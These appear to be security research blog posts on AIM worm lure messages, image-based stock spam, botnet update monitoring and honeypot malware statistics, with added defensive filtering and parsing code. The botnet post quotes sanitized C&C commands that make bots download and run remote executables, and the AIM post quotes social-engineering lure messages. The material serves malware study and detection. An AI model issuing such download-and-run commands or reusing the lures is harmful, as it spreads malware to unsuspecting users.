AIM Spreading

Thursday, January 11. 2007
If you use AIM or a similar instant messaging tool, you have presumably already seen messages like the following:

"which is better for my Myspace backround? http://www.myspace.com/Backgrounds/AllUsers/myspace-background-11.gif or http://www.myspace.com/Backgrounds/AllUsers/myspace-background-162.gif?"

"ooooooo. I bet Cingular isnt happy. http://www.cingular.com/phoneactivations/newphones/loadingringtones.usa.gs is stuck on the ringtones page haha. Supposed to be for "New Phone Activations". I tried it, got my 10. Wallpapers too. hurry b4 its fixed."

"which is a cooler buddy icon for me? http://www.buddyicons.com/humor/humor-icon-112.gif or http://www.buddyicon.com/action/moviestar-icon-11.gif?"

"hey is it ok with you if I upload this picture to my online albums? http://www.eblogs.com/user204/photos/picture36.jpg"


These are typical messages from bots spreading with the help of AIM: an infected machine sends instant messages to other people and tries, through social engineering or some other trick, to get the recipient to click on the link. The link points to the actual malware binary, so the unsuspecting user who runs it is infected in turn.
Fortunately, this kind of attack can be stopped rather easily, since AIM can filter the messages centrally on its servers. Polymorphism (changing the text with each message or making slight changes to the URL) would, on the other hand, make such filtering considerably harder...
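To show what central filtering can and cannot do against the polymorphism mentioned above, here is an added example (not code from the original post or from AIM): three filter rules a central IM service could keep, run over constructed messages modelled on the ones quoted above. The host name icons.example.net and all message texts are made up; the exact-text rule catches only the seed message, the URL-masked template rule survives changed file names, and the host rule survives rewording as long as the attacker keeps the hosting domain.

```python
import re
from urllib.parse import urlparse

# Regex for URLs embedded in message text.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Constructed samples modelled on the messages quoted above; the host is made up.
SEED = ("which is a cooler buddy icon for me? "
        "http://icons.example.net/humor/humor-icon-112.gif or "
        "http://icons.example.net/action/moviestar-icon-11.gif?")
VARIANTS = [
    SEED,
    # polymorphic variant 1: identical text, different file names in the URLs
    ("which is a cooler buddy icon for me? "
     "http://icons.example.net/humor/humor-icon-113.gif or "
     "http://icons.example.net/action/moviestar-icon-12.gif?"),
    # polymorphic variant 2: reworded text, new path, same hosting domain
    "lol which buddy icon should i use http://icons.example.net/funny/icon-7.gif",
]
LEGIT = "see you at 8, here is the map http://maps.example.org/directions?to=downtown"


def normalize(message):
    """Mask every URL and collapse whitespace/case so changed file names do not evade the rule."""
    return re.sub(r"\s+", " ", URL_RE.sub("<url>", message)).strip().lower()


# The three filter lists a central IM service could maintain, seeded from the first sample.
BLOCKED_MESSAGES = {SEED}
BLOCKED_TEMPLATES = {normalize(SEED)}
BLOCKED_HOSTS = {"icons.example.net"}


def hosts_in(message):
    """Host names of all URLs in the message, lower-cased."""
    hosts = set()
    for url in URL_RE.findall(message):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def filters_hit(message):
    """Return the names of the filters that would block this message."""
    hit = set()
    if message in BLOCKED_MESSAGES:
        hit.add("exact")
    if normalize(message) in BLOCKED_TEMPLATES:
        hit.add("template")
    if hosts_in(message) & BLOCKED_HOSTS:
        hit.add("host")
    return hit


if __name__ == "__main__":
    for m in VARIANTS + [LEGIT]:
        print(sorted(filters_hit(m)) or ["pass"], "<-", m[:60])
```

The host rule is the most robust of the three, but it is also the one the attacker can only escape by moving the binary to another domain, which is exactly why takedown of the hosting location matters as much as message filtering.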

Stock Spam

Wednesday, January 10. 2007
This morning I took a closer look at the last 500 messages in the spam folder of my Gmail account (roughly the last five days). 106 of them were stock spam, so a little more than 20% of the spam I receive is of this kind. These messages promote only eight different ticker symbols:

As you can see, all of these ticker symbols are traded on the Pink Sheets, an electronic quotation system for penny stocks.

Looking at how the stock quotes reacted, you can see some influence; some of the stocks are currently in their "pump" phase:


Presumably we will see the quotes drop in the next few days, once the "dump" phase begins.

Most stock spam messages nowadays are image-based: only two of the ticker symbols are advertised in plain-text messages, the other six arrive as images. Common OCR is pretty weak at recognizing the content of these images, since it is deliberately scrambled to make filtering harder. Running gocr over one of them gives:
$ gocr personnel.gif
_
H'LuN,.pK . H '% BIopH, ARMAcE%IcAL s_ocK!, , _
HEA%HeuNIv,E\RsE,I'nc
S_b'ol: HLU_ , ,
Price: $o.o8 ' ' , '
5.day Target: , $O.50 ,' ,
Rating: Strong Buy ,,
HLU_.PH .$15 billion, plastic _cosmetic surgey m,a_ket!
H L U . P H .,G ETrl G READY TO E X P L O' D,E ! ! ! _
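Even such garbled OCR output still carries enough structure to score. The following is an added example (my own code, not part of the original post and not what gocr or any spam filter ships): it takes the gocr output above as sample input, matches pump-and-dump vocabulary with regexes that tolerate punctuation and stray spaces between the letters, and looks for dollar amounts in which the digit 0 was read as the letter o. The keyword list, the benign comparison text and the threshold are my assumptions.

```python
import re

# gocr output of the spam image shown above, copied from the page and used as sample input.
OCR_SAMPLE = r"""
_
H'LuN,.pK . H '% BIopH, ARMAcE%IcAL s_ocK!, , _
HEA%HeuNIv,E\RsE,I'nc
S_b'ol: HLU_ , ,
Price: $o.o8 ' ' , '
5.day Target: , $O.50 ,' ,
Rating: Strong Buy ,,
HLU_.PH .$15 billion, plastic _cosmetic surgey m,a_ket!
H L U . P H .,G ETrl G READY TO E X P L O' D,E ! ! ! _
"""

# Constructed benign text for comparison.
BENIGN_SAMPLE = """
Hi, attached are the notes from Monday's meeting.
Could you look at section 3 before Friday? Thanks!
"""

# Phrases typical of pump-and-dump messages (assumed list).
KEYWORDS = ["symbol", "price", "target", "rating", "strong buy", "explode"]

# Anything that is not a letter or digit may appear between two characters of a keyword.
NOISE = r"[^a-z0-9]*"


def noisy_pattern(phrase):
    """Regex for `phrase` that tolerates OCR debris (punctuation, spaces) between its characters."""
    chars = [re.escape(c) for c in phrase if c.isalnum()]
    return re.compile(NOISE.join(chars), re.IGNORECASE)


# Dollar amounts where gocr has confused the digit 0 with the letter o/O.
PRICE_RE = re.compile(r"\$\s*[0-9oO]+\s*[.,]\s*[0-9oO]+")


def stock_spam_hits(text):
    """Return (matched keywords, price-like strings) found in the noisy text."""
    hits = [kw for kw in KEYWORDS if noisy_pattern(kw).search(text)]
    return hits, PRICE_RE.findall(text)


def is_stock_spam(text, min_keywords=3):
    """Tolerant matching raises the false-positive risk, so several hits plus a price are required."""
    hits, prices = stock_spam_hits(text)
    return len(hits) >= min_keywords and len(prices) >= 1


if __name__ == "__main__":
    print(stock_spam_hits(OCR_SAMPLE), is_stock_spam(OCR_SAMPLE))
    print(stock_spam_hits(BENIGN_SAMPLE), is_stock_spam(BENIGN_SAMPLE))
```

Note the limit of this approach: "Symbol" came out of gocr as "S_b'ol" with two letters dropped, so that keyword is missed entirely; inserted noise can be tolerated, missing characters cannot, which is why a single keyword should never be enough to classify a message.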


For more background on this kind of attack, take a look at our study on stock spam ("The Effect of Stock Spam on Financial Markets").

Botnet Monitoring And New Malware Samples

Tuesday, January 9. 2007
When monitoring botnets, you will often see updates in the channel used for command and control. An update means that the bots are instructed to download a binary file from a particular address and execute it. A few (sanitized) examples are:
.D0wnL04dF3nR8o http://www.debbiematenopoulos.tv/[...]/timer2.exe c:\timer222.exe 1 -s

!tryagain http://www.freewebtown.com/[...]/a9.exe

.update.g0d http://www.geocities.com/[...]/SkuZ.exe 1
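Command names differ from one bot family to the next, so when picking such updates out of captured channel traffic it is easier to match their shape than their names. Here is an added example (my own code, not something from the post or from any botnet monitoring tool): it takes the three sanitized lines above as sample input, keeping the post's "[...]" elisions as they are, plus one constructed line of ordinary chatter, and extracts command, download host, file name, the optional destination path on the victim and any trailing flags. The set of executable extensions and the IRC framing handled are assumptions.

```python
import re
from urllib.parse import urlparse

# The sanitized update commands quoted above (the "[...]" elisions are the post's, kept as-is),
# plus one constructed line of channel chatter to show what is not reported.
CC_LINES = [
    r".D0wnL04dF3nR8o http://www.debbiematenopoulos.tv/[...]/timer2.exe c:\timer222.exe 1 -s",
    r"!tryagain http://www.freewebtown.com/[...]/a9.exe",
    r".update.g0d http://www.geocities.com/[...]/SkuZ.exe 1",
    "PRIVMSG #channel :hello, anyone around?",
]

# Match the shape of an update command rather than its (family-specific) name:
# a "."- or "!"-prefixed command, an http URL, an optional Windows path, trailing flags.
UPDATE_RE = re.compile(
    r"^(?P<cmd>[.!]\S+)\s+"                     # bot command with its prefix
    r"(?P<url>https?://\S+)"                    # where to download the binary from
    r"(?:\s+(?P<dest>[A-Za-z]:\\\S+))?"         # optional path to store it on the victim
    r"(?P<rest>.*)$"                            # remaining arguments/flags
)
# Extensions treated as "a binary to execute" (assumed list).
EXECUTABLE_RE = re.compile(r"\.(exe|dll|scr|com|bat|pif)$", re.IGNORECASE)


def parse_update(line):
    """Return the fields of an update command, or None if the line is not one."""
    # Strip IRC framing ("PRIVMSG #chan :text") if present; bare lines pass through.
    payload = line.split(" :", 1)[1] if " :" in line else line
    m = UPDATE_RE.match(payload.strip())
    if not m:
        return None
    filename = m.group("url").rsplit("/", 1)[-1]
    if not EXECUTABLE_RE.search(filename):
        return None
    return {
        "cmd": m.group("cmd"),
        "url": m.group("url"),
        "host": urlparse(m.group("url")).hostname,
        "filename": filename,
        "dest": m.group("dest"),
        "args": m.group("rest").split(),
    }


def extract_updates(lines):
    """All update commands found in a block of captured channel traffic."""
    return [u for u in (parse_update(line) for line in lines) if u]


if __name__ == "__main__":
    for u in extract_updates(CC_LINES):
        print(u["cmd"], "->", u["host"], u["filename"], u["dest"], u["args"])
```

The extracted URL is what you want to fetch immediately after seeing such a command: the hosting accounts (free web space, in all three examples above) tend to disappear quickly, and the sample is usually gone with them.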

Attackers use these updates for different purposes, e.g., to migrate the whole botnet to a new C&C server or to add new functionality to the bots. Since these binaries are pushed to machines that are already infected rather than spreading actively in the wild, antivirus vendors rarely get hold of them, and it is rather hard for common antivirus engines to add detection for them. We collected 40 binaries this way in the last few weeks, and ClamAV detects only 12 of them (30%):
----------- SCAN SUMMARY -----------
Known viruses: 86219
Engine version: 0.88.5
Scanned directories: 0
Scanned files: 40
Infected files: 12
Data scanned: 12.66 MB

It seems there is still a long way to go before we can rely on AV...

Some Nepenthes Statistics

Monday, January 8. 2007
Here are some updated numbers on the autonomously spreading malware we observe with the help of nepenthes. The data comes from a sensor running the latest version of nepenthes on about 16,000 IP addresses. The sensor has been online since December 8, 2006, i.e., for one month now:
Total Number Of Hits: 6,325,331
Number Of Unique IPs: 8,994
Number Of Unique Malware: 1,555

Average Connections per Day: 950,771
Average Exploits per Day: 242,049

After sorting out some errors, scanning the remaining 1,497 binaries with the current version of ClamAV yields the following results:
----------- SCAN SUMMARY -----------
Known viruses: 86212
Engine version: 0.88.5
Scanned directories: 1
Scanned files: 1497
Infected files: 1243
Data scanned: 84.47 MB
Time: 17.578 sec (0 m 17 s)

Some of the files are presumably broken due to failed downloads or similar issues, so the real detection rate is presumably slightly better than the 83% (1,243 of 1,497) shown here. A more in-depth analysis with CWSandbox (new design!) will give a better picture...